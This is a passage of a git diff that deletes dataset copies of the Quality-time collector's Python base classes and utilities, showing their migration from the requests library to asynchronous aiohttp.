response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py deleted file mode 100644 index 0017516..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.source.py +++ /dev/null @@ -1,231 +0,0 @@ -"""Source collector base classes.""" - -import io -import logging -import traceback -import urllib -import zipfile -from abc import ABC, abstractmethod -from datetime import datetime -from http import HTTPStatus -from typing import cast, Dict, Final, List, Optional, Set, Tuple, Type, Union - -import requests - -from collector_utilities.functions import days_ago, tokenless, stable_traceback -from collector_utilities.type import ErrorMessage, Entities, Measurement, Response, Responses, URL, Value - - -class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - - TIMEOUT = 10 # Default timeout of 10 seconds - MAX_ENTITIES = 100 # The maximum number of entities (e.g. violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - - def __init__(self, source, datamodel) -> None: - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - - def __init_subclass__(cls) -> None: - SourceCollector.subclasses.add(cls) - super().__init_subclass__() - - @classmethod - def get_subclass(cls, source_type: str, metric_type: str) -> Type["SourceCollector"]: - """Return the subclass registered for the source/metric name. First try to find a match on both source type - and metric type. If no match is found, return the generic collector for the source type.""" - for class_name in (f"{source_type}{metric_type}", source_type): - matching_subclasses = [sc for sc in cls.subclasses if sc.__name__.lower() == class_name.replace("_", "")] - if matching_subclasses: - matching_subclasses[0].source_type = source_type - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - - def get(self) -> Measurement: - """Return the measurement from this source.""" - responses, api_url, connection_error = self.__safely_get_source_responses() - value, total, entities, parse_error = self.__safely_parse_source_responses(responses) - landing_url = self._landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - - def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument - """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into - a default landing url.""" - if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): - return URL(landing_url) - url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") - return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - - def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - - def quote_if_needed(parameter_value): - """Quote the string if needed.""" - return urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - - parameter_info = self._datamodel["sources"][self.source_type]["parameters"][parameter_key] - if "values" in parameter_info and parameter_info["type"].startswith("multiple_choice"): - value = self.__parameters.get(parameter_key) or parameter_info["values"] - else: - default_value = parameter_info.get("default_value", "") - value = self.__parameters.get(parameter_key, default_value) - if api_values := parameter_info.get("api_values"): - value = api_values.get(value, value) if isinstance(value, str) else [api_values.get(v, v) for v in value] - if parameter_key.endswith("url"): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - - def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: - responses = self._get_source_responses(api_url := self._api_url()) - for response in responses: - response.raise_for_status() - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - - def _get_source_responses(self, api_url: URL) -> Responses: - """Open the url. Can be overridden if a post request is needed or multiple requests need to be made.""" - return [ - requests.get(api_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials(), headers=self._headers())] - - def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use - """Return the headers for the request.""" - return dict() - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" - if token := cast(str, self.__parameters.get("private_token", "")): - return token, "" - username = cast(str, self.__parameters.get("username", "")) - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - - def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" - entities: Entities = [] - value, total, error = None, None, None - if responses: - try: - value, total, entities = self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. - This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - - -class FileSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve files.""" - - file_extensions: List[str] = [] # Subclass responsibility - - def _get_source_responses(self, api_url: URL) -> Responses: - responses = super()._get_source_responses(api_url) - if not api_url.endswith(".zip"): - return responses - unzipped_responses = [] - for response in responses: - unzipped_responses.extend(self.__unzip(response)) - return unzipped_responses - - def _headers(self) -> Dict[str, str]: - headers = super()._headers() - if token := cast(str, self._parameter("private_token")): - # GitLab needs this header, see - # https://docs.gitlab.com/ee/api/jobs.html#download-a-single-artifact-file-by-job-id - headers["Private-Token"] = token - return headers - - @classmethod - def __unzip(cls, response: Response) -> Responses: - """Unzip the response content and return a (new) response for each applicable file in the zip archive.""" - responses = [] - with zipfile.ZipFile(io.BytesIO(response.content)) as response_zipfile: - names = [name for name in response_zipfile.namelist() if name.split(".")[-1].lower() in cls.file_extensions] - for name in names: - unzipped_response = requests.Response() - unzipped_response.raw = io.BytesIO(response_zipfile.read(name)) - unzipped_response.status_code = HTTPStatus.OK - responses.append(unzipped_response) - return responses - - -class HTMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve HTML files.""" - - file_extensions = ["html", "htm"] - - -class JSONFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve JSON files.""" - - file_extensions = ["json"] - - -class XMLFileSourceCollector(FileSourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that retrieve XML files.""" - - file_extensions = ["xml"] - - -class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - - def _get_source_responses(self, api_url: URL) -> Responses: - fake_response = requests.Response() - fake_response.status_code = HTTPStatus.OK - return [fake_response] # Return a fake response so that the parse methods will be called - - -class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) - for branch in self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod - def _unmerged_branches(self, responses: Responses) -> List: - """Return the list of unmerged branch.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: - """Return the date and time of the last commit on the branch.""" - - -class SourceUpToDatenessCollector(SourceCollector): - """Base class for source up-to-dateness collectors.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - return str(days_ago(min(self._parse_source_response_date_time(response) for response in responses))), "100", [] - - def _parse_source_response_date_time(self, response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py deleted file mode 100644 index 339ec3a..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$base_collectors$source_collector.py.target.py +++ /dev/null @@ -1,205 +0,0 @@ -"""Source collector base classes.""" - -import asyncio -import json -import logging -import traceback -import urllib -from abc import ABC, abstractmethod -from datetime import datetime -from http import HTTPStatus -from typing import cast, Any, Dict, Final, List, Optional, Set, Tuple, Type, Union - -import aiohttp - -from collector_utilities.functions import days_ago, tokenless, stable_traceback -from collector_utilities.type import ErrorMessage, Entities, JSON, Measurement, Response, Responses, URL, Value - - -class SourceCollector(ABC): - """Base class for source collectors. Source collectors are subclasses of this class that know how to collect the - measurement data for one specific metric from one specific source.""" - - MAX_ENTITIES = 100 # The maximum number of entities (e.g. violations, warnings) to send to the server - API_URL_PARAMETER_KEY = "url" - source_type = "" # The source type is set on the subclass, when the subclass is registered - subclasses: Set[Type["SourceCollector"]] = set() - - def __init__(self, session: aiohttp.ClientSession, source, datamodel) -> None: - self._session = session - self._datamodel: Final = datamodel - self.__parameters: Final[Dict[str, Union[str, List[str]]]] = source.get("parameters", {}) - - def __init_subclass__(cls) -> None: - SourceCollector.subclasses.add(cls) - super().__init_subclass__() - - @classmethod - def get_subclass(cls, source_type: str, metric_type: str) -> Type["SourceCollector"]: - """Return the subclass registered for the source/metric name. First try to find a match on both source type - and metric type. If no match is found, return the generic collector for the source type.""" - for class_name in (f"{source_type}{metric_type}", source_type): - matching_subclasses = [sc for sc in cls.subclasses if sc.__name__.lower() == class_name.replace("_", "")] - if matching_subclasses: - matching_subclasses[0].source_type = source_type - return matching_subclasses[0] - raise LookupError(f"Couldn't find collector subclass for source {source_type} and metric {metric_type}") - - async def get(self) -> Measurement: - """Return the measurement from this source.""" - responses, api_url, connection_error = await self.__safely_get_source_responses() - value, total, entities, parse_error = await self.__safely_parse_source_responses(responses) - landing_url = await self.__safely_parse_landing_url(responses) - return dict(api_url=api_url, landing_url=landing_url, value=value, total=total, entities=entities, - connection_error=connection_error, parse_error=parse_error) - - async def _api_url(self) -> URL: - """Translate the url parameter into the API url.""" - return URL(cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/")) - - def _parameter(self, parameter_key: str, quote: bool = False) -> Union[str, List[str]]: - """Return the parameter value.""" - - def quote_if_needed(parameter_value: str) -> str: - """Quote the string if needed.""" - return urllib.parse.quote(parameter_value, safe="") if quote else parameter_value - - parameter_info = self._datamodel["sources"][self.source_type]["parameters"][parameter_key] - if "values" in parameter_info and parameter_info["type"].startswith("multiple_choice"): - value = self.__parameters.get(parameter_key) or parameter_info["values"] - else: - default_value = parameter_info.get("default_value", "") - value = self.__parameters.get(parameter_key, default_value) - if api_values := parameter_info.get("api_values"): - value = api_values.get(value, value) if isinstance(value, str) else [api_values.get(v, v) for v in value] - if parameter_key.endswith("url"): - value = cast(str, value).rstrip("/") - return quote_if_needed(value) if isinstance(value, str) else [quote_if_needed(v) for v in value] - - async def __safely_get_source_responses(self) -> Tuple[Responses, URL, ErrorMessage]: - """Connect to the source and get the data, without failing. This method should not be overridden - because it makes sure the collection of source data never causes the collector to fail.""" - responses: Responses = [] - api_url = URL("") - error = None - try: - responses = await self._get_source_responses(api_url := await self._api_url()) - logging.info("Retrieved %s", tokenless(api_url) or self.__class__.__name__) - except Exception as reason: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - logging.warning("Failed to retrieve %s: %s", tokenless(api_url) or self.__class__.__name__, reason) - return responses, api_url, error - - async def _get_source_responses(self, *urls: URL) -> Responses: - """Open the url. Can be overridden if a post request is needed or serial requests need to be made.""" - kwargs: Dict[str, Any] = dict() - credentials = self._basic_auth_credentials() - if credentials is not None: - kwargs["auth"] = aiohttp.BasicAuth(credentials[0], credentials[1]) - if headers := self._headers(): - kwargs["headers"] = headers - tasks = [self._session.get(url, **kwargs) for url in urls] - return list(await asyncio.gather(*tasks)) - - def _basic_auth_credentials(self) -> Optional[Tuple[str, str]]: - """Return the basic authentication credentials, if any.""" - if token := cast(str, self.__parameters.get("private_token", "")): - return token, "" - username = cast(str, self.__parameters.get("username", "")) - password = cast(str, self.__parameters.get("password", "")) - return (username, password) if username and password else None - - def _headers(self) -> Dict[str, str]: # pylint: disable=no-self-use - """Return the headers for the get request.""" - return {} - - async def __safely_parse_source_responses( - self, responses: Responses) -> Tuple[Value, Value, Entities, ErrorMessage]: - """Parse the data from the responses, without failing. This method should not be overridden because it - makes sure that the parsing of source data never causes the collector to fail.""" - entities: Entities = [] - value, total, error = None, None, None - if responses: - try: - value, total, entities = await self._parse_source_responses(responses) - except Exception: # pylint: disable=broad-except - error = stable_traceback(traceback.format_exc()) - return value, total, entities[:self.MAX_ENTITIES], error - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - """Parse the responses to get the measurement value, the total value, and the entities for the metric. - This method can be overridden by collectors to parse the retrieved sources data.""" - # pylint: disable=assignment-from-none,no-self-use,unused-argument - return None, "100", [] # pragma nocover - - async def __safely_parse_landing_url(self, responses: Responses) -> URL: - """Parse the responses to get the landing url, without failing. This method should not be overridden because - it makes sure that the parsing of source data never causes the collector to fail.""" - try: - return await self._landing_url(responses) - except Exception: # pylint: disable=broad-except - return await self._api_url() - - async def _landing_url(self, responses: Responses) -> URL: # pylint: disable=unused-argument - """Return the user supplied landing url parameter if there is one, otherwise translate the url parameter into - a default landing url.""" - if landing_url := cast(str, self.__parameters.get("landing_url", "")).rstrip("/"): - return URL(landing_url) - url = cast(str, self.__parameters.get(self.API_URL_PARAMETER_KEY, "")).rstrip("/") - return URL(url[:-(len("xml"))] + "html" if url.endswith(".xml") else url) - - -class FakeResponse: # pylint: disable=too-few-public-methods - """Fake a response because aiohttp.ClientResponse can not easily be instantiated directly. """ - status = HTTPStatus.OK - - def __init__(self, contents: bytes = bytes()) -> None: - super().__init__() - self.contents = contents - - async def json(self) -> JSON: - """Return the JSON version of the contents.""" - return cast(JSON, json.loads(self.contents)) - - async def text(self) -> str: - """Return the text version of the contents.""" - return str(self.contents.decode()) - - -class LocalSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for source collectors that do not need to access the network but return static or user-supplied - data.""" - - async def _get_source_responses(self, *urls: URL) -> Responses: - return [cast(Response, FakeResponse())] # Return a fake response so that the parse methods will be called - - -class UnmergedBranchesSourceCollector(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for unmerged branches source collectors.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities = [ - dict(key=branch["name"], name=branch["name"], commit_age=str(days_ago(self._commit_datetime(branch))), - commit_date=str(self._commit_datetime(branch).date())) - for branch in await self._unmerged_branches(responses)] - return str(len(entities)), "100", entities - - @abstractmethod - async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: - """Return the list of unmerged branches.""" - - @abstractmethod - def _commit_datetime(self, branch) -> datetime: - """Return the date and time of the last commit on the branch.""" - - -class SourceUpToDatenessCollector(SourceCollector): - """Base class for source up-to-dateness collectors.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - date_times = await asyncio.gather(*[self._parse_source_response_date_time(response) for response in responses]) - return str(days_ago(min(date_times))), "100", [] - - async def _parse_source_response_date_time(self, response: Response) -> datetime: - """Parse the date time from the source.""" - raise NotImplementedError # pragma: nocover diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff deleted file mode 100644 index 1816644..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.diff +++ /dev/null @@ -1,67 +0,0 @@ -diff --git a/components/collector/src/collector_utilities/functions.py b/components/collector/src/collector_utilities/functions.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/collector_utilities/functions.py - +++ b/components/collector/src/collector_utilities/functions.py -@@ -4,8 +4,8 @@ import contextlib - import hashlib - import re - import urllib --from datetime import datetime, timedelta --from typing import cast, Collection, Pattern, Tuple -+from datetime import datetime -+from typing import cast, Collection, Generator, Pattern, Tuple - from xml.etree.ElementTree import Element # nosec, Element is not available from defusedxml, but only used as type - - from defusedxml import ElementTree -@@ -13,24 +13,24 @@ from defusedxml import ElementTree - from .type import Namespaces, Response, URL - - --def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: -+async def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" -- tree = cast(Element, ElementTree.fromstring(response.text)) -+ tree = cast(Element, ElementTree.fromstring(await response.text())) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - --def parse_source_response_xml_with_namespace( -+async def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" -- tree = parse_source_response_xml(response, allowed_root_tags) -+ tree = await parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - --Substitution = Tuple[Pattern, str] -+Substitution = Tuple[Pattern[str], str] - MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") - TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") - KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -@@ -92,17 +92,17 @@ def match_string_or_regular_expression(string: str, strings_and_or_regular_expre - - class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" -- def __init__(self): -+ def __init__(self) -> None: - self.start = datetime.now() -- self.duration = timedelta() -+ self.duration = 0.0 - -- def stop(self): -+ def stop(self) -> None: - """Stop the clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - - @contextlib.contextmanager --def timer(): -+def timer() -> Generator[Clock, None, None]: - """Timer context manager.""" - clock = Clock() - yield clock diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py deleted file mode 100644 index a5ae4ed..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.source.py +++ /dev/null @@ -1,109 +0,0 @@ -"""Utility functions.""" - -import contextlib -import hashlib -import re -import urllib -from datetime import datetime, timedelta -from typing import cast, Collection, Pattern, Tuple -from xml.etree.ElementTree import Element # nosec, Element is not available from defusedxml, but only used as type - -from defusedxml import ElementTree - -from .type import Namespaces, Response, URL - - -def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" - tree = cast(Element, ElementTree.fromstring(response.text)) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - -def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" - tree = parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - -Substitution = Tuple[Pattern, str] -MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") -TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") -KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -HASH_SUB: Substitution = (re.compile(r"(?i)[a-f0-9]{20,}"), "hashremoved") - - -def stable_traceback(traceback: str) -> str: - """Remove memory addresses from the traceback so make it easier to compare tracebacks.""" - for reg_exp, replacement in [MEMORY_ADDRESS_SUB, TOKEN_SUB, KEY_SUB]: - traceback = re.sub(reg_exp, replacement, traceback) - return traceback - - -def tokenless(url: URL) -> URL: - """Strip private tokens from the url.""" - return URL(re.sub(TOKEN_SUB[0], TOKEN_SUB[1], url)) - - -def hashless(url: URL) -> URL: - """Strip hashes from the url so that it can be used as part of a issue key.""" - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(str(url)) - path = re.sub(HASH_SUB[0], HASH_SUB[1], path) - query = re.sub(HASH_SUB[0], HASH_SUB[1], query) - fragment = re.sub(HASH_SUB[0], HASH_SUB[1], fragment) - return URL(urllib.parse.urlunsplit((scheme, netloc, path, query, fragment))) - - -def md5_hash(string: str) -> str: - """Return a md5 hash of the string.""" - return hashlib.md5(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def sha1_hash(string: str) -> str: - """Return a sha1 hash of the string.""" - return hashlib.sha1(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def days_ago(date_time: datetime) -> int: - """Return the days since the date/time.""" - return (datetime.now(tz=date_time.tzinfo) - date_time).days - - -def is_regexp(string: str) -> bool: - """Return whether the string looks like a regular expression.""" - return bool(set("$^?.+*[]") & set(string)) - - -def match_string_or_regular_expression(string: str, strings_and_or_regular_expressions: Collection[str]) -> bool: - """Return whether the string is equal to one of the strings or matches one of the regular expressions.""" - for string_or_regular_expression in strings_and_or_regular_expressions: - if is_regexp(string_or_regular_expression): - if re.match(string_or_regular_expression, string): - return True - else: - if string_or_regular_expression == string: - return True - return False - - -class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" - def __init__(self): - self.start = datetime.now() - self.duration = timedelta() - - def stop(self): - """Stop the clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - -@contextlib.contextmanager -def timer(): - """Timer context manager.""" - clock = Clock() - yield clock - clock.stop() diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py deleted file mode 100644 index 08bf8a1..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$functions.py.target.py +++ /dev/null @@ -1,109 +0,0 @@ -"""Utility functions.""" - -import contextlib -import hashlib -import re -import urllib -from datetime import datetime -from typing import cast, Collection, Generator, Pattern, Tuple -from xml.etree.ElementTree import Element # nosec, Element is not available from defusedxml, but only used as type - -from defusedxml import ElementTree - -from .type import Namespaces, Response, URL - - -async def parse_source_response_xml(response: Response, allowed_root_tags: Collection[str] = None) -> Element: - """Parse the XML from the source response.""" - tree = cast(Element, ElementTree.fromstring(await response.text())) - if allowed_root_tags and tree.tag not in allowed_root_tags: - raise AssertionError(f'The XML root element should be one of "{allowed_root_tags}" but is "{tree.tag}"') - return tree - - -async def parse_source_response_xml_with_namespace( - response: Response, allowed_root_tags: Collection[str] = None) -> Tuple[Element, Namespaces]: - """Parse the XML with namespace from the source response.""" - tree = await parse_source_response_xml(response, allowed_root_tags) - # ElementTree has no API to get the namespace so we extract it from the root tag: - namespaces = dict(ns=tree.tag.split('}')[0][1:]) - return tree, namespaces - - -Substitution = Tuple[Pattern[str], str] -MEMORY_ADDRESS_SUB: Substitution = (re.compile(r" at 0x[0-9abcdef]+>"), ">") -TOKEN_SUB: Substitution = (re.compile(r"token=[0-9a-zA-Z]+"), "token=") -KEY_SUB: Substitution = (re.compile(r"key=[0-9abcdef]+"), "key=") -HASH_SUB: Substitution = (re.compile(r"(?i)[a-f0-9]{20,}"), "hashremoved") - - -def stable_traceback(traceback: str) -> str: - """Remove memory addresses from the traceback so make it easier to compare tracebacks.""" - for reg_exp, replacement in [MEMORY_ADDRESS_SUB, TOKEN_SUB, KEY_SUB]: - traceback = re.sub(reg_exp, replacement, traceback) - return traceback - - -def tokenless(url: URL) -> URL: - """Strip private tokens from the url.""" - return URL(re.sub(TOKEN_SUB[0], TOKEN_SUB[1], url)) - - -def hashless(url: URL) -> URL: - """Strip hashes from the url so that it can be used as part of a issue key.""" - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(str(url)) - path = re.sub(HASH_SUB[0], HASH_SUB[1], path) - query = re.sub(HASH_SUB[0], HASH_SUB[1], query) - fragment = re.sub(HASH_SUB[0], HASH_SUB[1], fragment) - return URL(urllib.parse.urlunsplit((scheme, netloc, path, query, fragment))) - - -def md5_hash(string: str) -> str: - """Return a md5 hash of the string.""" - return hashlib.md5(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def sha1_hash(string: str) -> str: - """Return a sha1 hash of the string.""" - return hashlib.sha1(string.encode("utf-8")).hexdigest() # nosec, Not used for cryptography - - -def days_ago(date_time: datetime) -> int: - """Return the days since the date/time.""" - return (datetime.now(tz=date_time.tzinfo) - date_time).days - - -def is_regexp(string: str) -> bool: - """Return whether the string looks like a regular expression.""" - return bool(set("$^?.+*[]") & set(string)) - - -def match_string_or_regular_expression(string: str, strings_and_or_regular_expressions: Collection[str]) -> bool: - """Return whether the string is equal to one of the strings or matches one of the regular expressions.""" - for string_or_regular_expression in strings_and_or_regular_expressions: - if is_regexp(string_or_regular_expression): - if re.match(string_or_regular_expression, string): - return True - else: - if string_or_regular_expression == string: - return True - return False - - -class Clock: # pylint: disable=too-few-public-methods - """Class to keep track of time.""" - def __init__(self) -> None: - self.start = datetime.now() - self.duration = 0.0 - - def stop(self) -> None: - """Stop the clock.""" - self.duration = (datetime.now() - self.start).total_seconds() - - -@contextlib.contextmanager -def timer() -> Generator[Clock, None, None]: - """Timer context manager.""" - clock = Clock() - yield clock - clock.stop() diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff deleted file mode 100644 index 710eb55..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.diff +++ /dev/null @@ -1,23 +0,0 @@ -diff --git a/components/collector/src/collector_utilities/type.py b/components/collector/src/collector_utilities/type.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/collector_utilities/type.py - +++ b/components/collector/src/collector_utilities/type.py -@@ -2,7 +2,8 @@ - - from typing import Any, Dict, List, NewType, Optional, Union - --import requests -+import aiohttp -+ - - Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name - Entities = List[Entity] -@@ -12,7 +13,7 @@ Jobs = List[Job] - JSON = Dict[str, Any] - Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping - Measurement = Dict[str, Any] --Response = requests.Response -+Response = aiohttp.ClientResponse - Responses = List[Response] - URL = NewType("URL", str) - Value = Optional[str] diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py deleted file mode 100644 index f42652d..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.source.py +++ /dev/null @@ -1,18 +0,0 @@ -"""Quality-time specific types.""" - -from typing import Any, Dict, List, NewType, Optional, Union - -import requests - -Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name -Entities = List[Entity] -ErrorMessage = Optional[str] -Job = Dict[str, Any] -Jobs = List[Job] -JSON = Dict[str, Any] -Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping -Measurement = Dict[str, Any] -Response = requests.Response -Responses = List[Response] -URL = NewType("URL", str) -Value = Optional[str] diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py deleted file mode 100644 index 6eea626..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py +++ /dev/null @@ -1,19 +0,0 @@ -"""Quality-time specific types.""" - -from typing import Any, Dict, List, NewType, Optional, Union - -import aiohttp - - -Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name -Entities = List[Entity] -ErrorMessage = Optional[str] -Job = Dict[str, Any] -Jobs = List[Job] -JSON = Dict[str, Any] -Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping -Measurement = Dict[str, Any] -Response = aiohttp.ClientResponse -Responses = List[Response] -URL = NewType("URL", str) -Value = Optional[str] diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff deleted file mode 100644 index 9fd73b4..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff +++ /dev/null @@ -1,218 +0,0 @@ -diff --git a/components/collector/src/source_collectors/azure_devops.py b/components/collector/src/source_collectors/api_source_collectors/azure_devops.py - index 